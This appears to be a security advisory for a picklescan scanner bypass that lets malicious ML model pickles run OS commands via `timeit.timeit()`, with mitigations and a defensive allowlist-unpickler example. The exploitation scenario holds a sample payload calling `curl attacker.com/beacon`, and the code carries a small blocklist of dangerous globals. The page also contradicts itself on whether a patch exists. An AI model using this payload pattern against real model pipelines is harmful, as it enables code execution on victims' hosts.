CVE-2025-71351: picklescan: scanner bypass enables RCE via pickle files

HIGH
Published June 21, 2026
CISO Take

picklescan before version 0.0.25 contains an incomplete blocklist (CWE-184) that fails to flag malicious pickle files crafted with `timeit.timeit()` inside a `__reduce__` method — a technique that lets attackers import `os` and execute arbitrary system commands while appearing clean to the scanner. Organizations relying on picklescan as a security gate before loading ML models from external sources — model hubs, partner feeds, CI/CD pipelines — now face a false sense of protection: the scanner gives a green light, and the payload detonates on `pickle.load()`. Although there is no public exploit and EPSS data is not yet available, the attack requires only moderate skill (knowledge of pickle internals and scanner logic), the package carries a risk score of 53/100 with 73 prior CVEs, and supply-chain model poisoning is a proven vector against AI/ML teams. Patch to picklescan 0.0.25 immediately; supplement with fickling for defense-in-depth, and consider migrating model serialization to safetensors where possible.

Sources: NVD, GitHub Advisory, VulnCheck, ATLAS

What is the risk?

High. The vulnerability is a defense evasion bypass in a security control, not in a model-serving library itself — the blast radius scales with every organization that trusts picklescan as its primary gate against malicious models. Exploitation requires no elevated privileges and no network access beyond delivering the crafted file; once the file passes the scanner it executes on any `pickle.load()` call. EPSS and KEV data are absent at publication time, but the technique is straightforward for an attacker with pickle serialization knowledge. The 3 direct downstream dependents understate risk — picklescan is commonly integrated directly into CI/CD scripts and pre-load hooks rather than as a library import.

How does the attack unfold?

  1. Craft Malicious Artifact (AML.T0011.000): the attacker creates a pickle file whose `__reduce__` method calls `timeit.timeit()` wrapping `os.system()`, a pattern picklescan's blocklist does not match.

  2. Evade Security Scanner (AML.T0107): the crafted file is submitted to a picklescan-protected pipeline; the scanner returns a clean result because of the incomplete blocklist (CWE-184).

  3. Deliver via Supply Chain (AML.T0010.001): the "clean" model file is accepted into the model registry, CI/CD artifact store, or a downstream system as a trusted artifact.

  4. Remote Code Execution (AML.T0018.002): when the model is loaded via `pickle.load()`, the timeit wrapper executes the embedded OS command, giving the attacker shell access on the pipeline host.

What systems are affected?

Package: picklescan
Ecosystem: pip
Vulnerable Range: (not listed)
Patched: No patch
Package stats: 413 · 3 dependents · pushed 1mo ago · 77% patched · ~12d to patch


How severe is it?

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Moderate

What should I do?

5 steps
  1. Patch: upgrade picklescan to 0.0.25 or later immediately — the vendor advisory confirms the fix is available.

  2. Defense-in-depth: deploy fickling (also in your tracked packages) alongside or as a replacement; fickling performs static AST-level analysis rather than pattern matching, making it harder to bypass via opcode aliasing.

  3. Migration: shift model serialization to safetensors format (tracked package) where supported — it is not executable and eliminates the pickle RCE class entirely.

  4. Detection: audit CI/CD logs for any model files that passed picklescan scans in the last 90 days (prior to the 0.0.25 patch); treat any externally sourced pickle file loaded in that window as potentially untrusted.

  5. Sandbox: run pickle.load() in an isolated subprocess or container with no network access and minimal filesystem permissions as a compensating control during the patch window.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, robustness and cybersecurity
ISO 42001: A.6.2.6 - AI system tools and infrastructure
NIST AI RMF: GOVERN 6.1 - AI supply chain risk management policies
OWASP LLM Top 10: LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-71351?

picklescan before version 0.0.25 contains an incomplete blocklist (CWE-184) that fails to flag malicious pickle files crafted with `timeit.timeit()` inside a `__reduce__` method — a technique that lets attackers import `os` and execute arbitrary system commands while appearing clean to the scanner. Organizations relying on picklescan as a security gate before loading ML models from external sources — model hubs, partner feeds, CI/CD pipelines — now face a false sense of protection: the scanner gives a green light, and the payload detonates on `pickle.load()`. Although there is no public exploit and EPSS data is not yet available, the attack requires only moderate skill (knowledge of pickle internals and scanner logic), the package carries a risk score of 53/100 with 73 prior CVEs, and supply-chain model poisoning is a proven vector against AI/ML teams. Patch to picklescan 0.0.25 immediately; supplement with fickling for defense-in-depth, and consider migrating model serialization to safetensors where possible.

Is CVE-2025-71351 actively exploited?

No confirmed active exploitation of CVE-2025-71351 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-71351?

  1. Patch: upgrade picklescan to 0.0.25 or later immediately — the vendor advisory confirms the fix is available.

  2. Defense-in-depth: deploy fickling (also in your tracked packages) alongside or as a replacement; fickling performs static AST-level analysis rather than pattern matching, making it harder to bypass via opcode aliasing.

  3. Migration: shift model serialization to safetensors format (tracked package) where supported — it is not executable and eliminates the pickle RCE class entirely.

  4. Detection: audit CI/CD logs for any model files that passed picklescan scans in the last 90 days (prior to the 0.0.25 patch); treat any externally sourced pickle file loaded in that window as potentially untrusted.

  5. Sandbox: run `pickle.load()` in an isolated subprocess or container with no network access and minimal filesystem permissions as a compensating control during the patch window.

What systems are affected by CVE-2025-71351?

This vulnerability affects the following AI/ML architecture patterns: ML model repositories and registries, training pipelines, model serving, AI/ML CI/CD pipelines, and agent frameworks with tool/model loading.

What is the CVSS score for CVE-2025-71351?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

  • ML model repositories and registries
  • Training pipelines
  • Model serving
  • AI/ML CI/CD pipelines
  • Agent frameworks with tool/model loading

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0011.000 Unsafe AI Artifacts
AML.T0018.002 Embed Malware
AML.T0107 Exploitation for Defense Evasion

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.6
NIST AI RMF: GOVERN 6.1
OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

picklescan before 0.0.25 fails to detect malicious pickle files that use timeit.timeit() in the __reduce__ method, allowing remote code execution. Attackers can craft pickle files that import dangerous libraries like os and execute arbitrary system commands, which evade picklescan detection and execute when pickle.load() is called.

Exploitation Scenario

An attacker targeting an ML team's model ingestion pipeline identifies that the organization uses picklescan to vet community models before loading. They craft a seemingly legitimate fine-tuned model file where the serialized object's `__reduce__` method calls `timeit.timeit('import os; os.system("curl attacker.com/beacon")', number=1)` — a construct that picklescan's pattern-based blocklist does not flag. The attacker publishes this model to a public hub or submits it via a partner channel. The CI/CD pipeline runs picklescan, receives a clean result, and proceeds to load the model. On `pickle.load()`, the timeit wrapper executes, spawning an OS shell command that could install a reverse shell, exfiltrate training data, or pivot to adjacent cluster nodes via available credentials.

Weaknesses (CWE)

CWE-184 — Incomplete List of Disallowed Inputs: The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.

  • [Implementation] Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.

Source: MITRE CWE corpus.
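The remedy in that CWE note, applied to pickle, is to enumerate what a model file is allowed to import rather than what it is forbidden to. The following example is added for this page and is not code from picklescan, fickling or any other project named here. It puts the two approaches side by side: a static pre-scan of the pickle opcode stream that lists every imported global, a hypothetical and deliberately narrow blocklist that misses `timeit.timeit` exactly as CWE-184 predicts, and an allowlist-enforcing `pickle.Unpickler` subclass that refuses any global not on its list, which complements the isolated-subprocess control in step 5 of the recommendations. The allowlist (only `collections.OrderedDict`, as a state_dict-style checkpoint needs) is an assumption for the example. The sample inputs are constructed inline: a benign `OrderedDict` checkpoint and a harmless stand-in for the `__reduce__` pattern described above whose timed statement is `pass`.

```python
import io
import pickle
import pickletools
import timeit
from collections import OrderedDict

# Assumption for this example: the model format needs only OrderedDict (as a
# state_dict-style checkpoint does).  A real deployment lists exactly the
# classes its format requires and nothing else.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}

# A hypothetical, deliberately narrow blocklist of the kind CWE-184 warns about.
# It is not picklescan's list; it exists only to show the gap.
ILLUSTRATIVE_BLOCKLIST = {("os", "system"), ("subprocess", "Popen"), ("builtins", "eval")}

# pickletools opcode names grouped by what they do to the stack and memo.
_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
               "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
_GET_OPS = {"GET", "BINGET", "LONG_BINGET"}
_PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}


def referenced_globals(data: bytes) -> list:
    """Statically list every (module, name) a pickle stream imports, without loading it.

    GLOBAL/INST carry 'module name' inline; STACK_GLOBAL (protocol 4+) takes
    module and name from the two values pushed just before it, which may be
    string constants or memo lookups of earlier strings.  Anything that cannot
    be resolved is reported as '<unresolved>' so a policy can fail closed.
    """
    refs = []
    memo = {}      # memo slot -> string constant, or None if the slot holds a non-string
    pushed = []    # values pushed since the last opcode that was not a push/memo op
    last = None    # most recently pushed value, if it was a string
    for op, arg, _pos in pickletools.genops(data):
        if op.name in _STRING_OPS:
            last = arg
            pushed.append(arg)
        elif op.name in _GET_OPS:
            last = memo.get(arg)
            pushed.append(last)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = last
        elif op.name in _PUT_OPS:
            memo[arg] = last
        else:
            if op.name in ("GLOBAL", "INST"):
                module, name = arg.split(" ", 1)
                refs.append((module, name))
            elif op.name == "STACK_GLOBAL":
                if len(pushed) >= 2 and None not in pushed[-2:]:
                    refs.append((pushed[-2], pushed[-1]))
                else:
                    refs.append(("<unresolved>", "<unresolved>"))
            last, pushed = None, []
    return refs


def blocklist_scan(data: bytes) -> list:
    """The CWE-184 anti-pattern: report only globals that appear on a known-bad list."""
    return [ref for ref in referenced_globals(data) if ref in ILLUSTRATIVE_BLOCKLIST]


def allowlist_scan(data: bytes) -> list:
    """Report every global not explicitly allowed; unresolved references count as disallowed."""
    return [ref for ref in referenced_globals(data) if ref not in ALLOWED_GLOBALS]


class AllowlistUnpickler(pickle.Unpickler):
    """Enforcing control: refuse to resolve any global that is not on the allowlist.

    find_class() is the only route by which GLOBAL, INST and STACK_GLOBAL
    obtain a callable, so a later REDUCE of timeit.timeit never gets one.
    """

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"refusing to import {module}.{name}: not on the allowlist")
        return super().find_class(module, name)


def safe_load(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


def load_is_rejected(data: bytes) -> bool:
    """True if the allowlist unpickler refuses the stream."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


# Constructed sample input: a benign state_dict-style checkpoint whose only global is OrderedDict.
BENIGN_MODEL = pickle.dumps(OrderedDict([("w", [0.5, -0.25]), ("b", [0.0])]), protocol=4)


class _TimeitReduce:
    """Constructed, harmless stand-in for the __reduce__ pattern in the advisory.

    The timed statement is 'pass', so even an unguarded pickle.load() only times
    a no-op; what matters is that the stream references timeit.timeit, which a
    blocklist lacking that entry never sees.
    """

    def __reduce__(self):
        return (timeit.timeit, ("pass",))


SUSPICIOUS_MODEL = pickle.dumps(_TimeitReduce(), protocol=4)


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_MODEL), ("suspicious", SUSPICIOUS_MODEL)):
        print(f"{label}: globals={referenced_globals(blob)} blocklist_flags={blocklist_scan(blob)} "
              f"allowlist_flags={allowlist_scan(blob)} loader_rejects={load_is_rejected(blob)}")
```

Run it directly to see both inputs scanned and loaded. The static scan is advisory and reports a reference it cannot resolve as `<unresolved>`, which the allowlist scan treats as disallowed; `find_class` is the enforcing control, and it should still run inside the isolated subprocess from step 5 rather than replacing it.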

Timeline

Published: June 21, 2026
Last Modified: June 21, 2026
First Seen: June 21, 2026

Related Vulnerabilities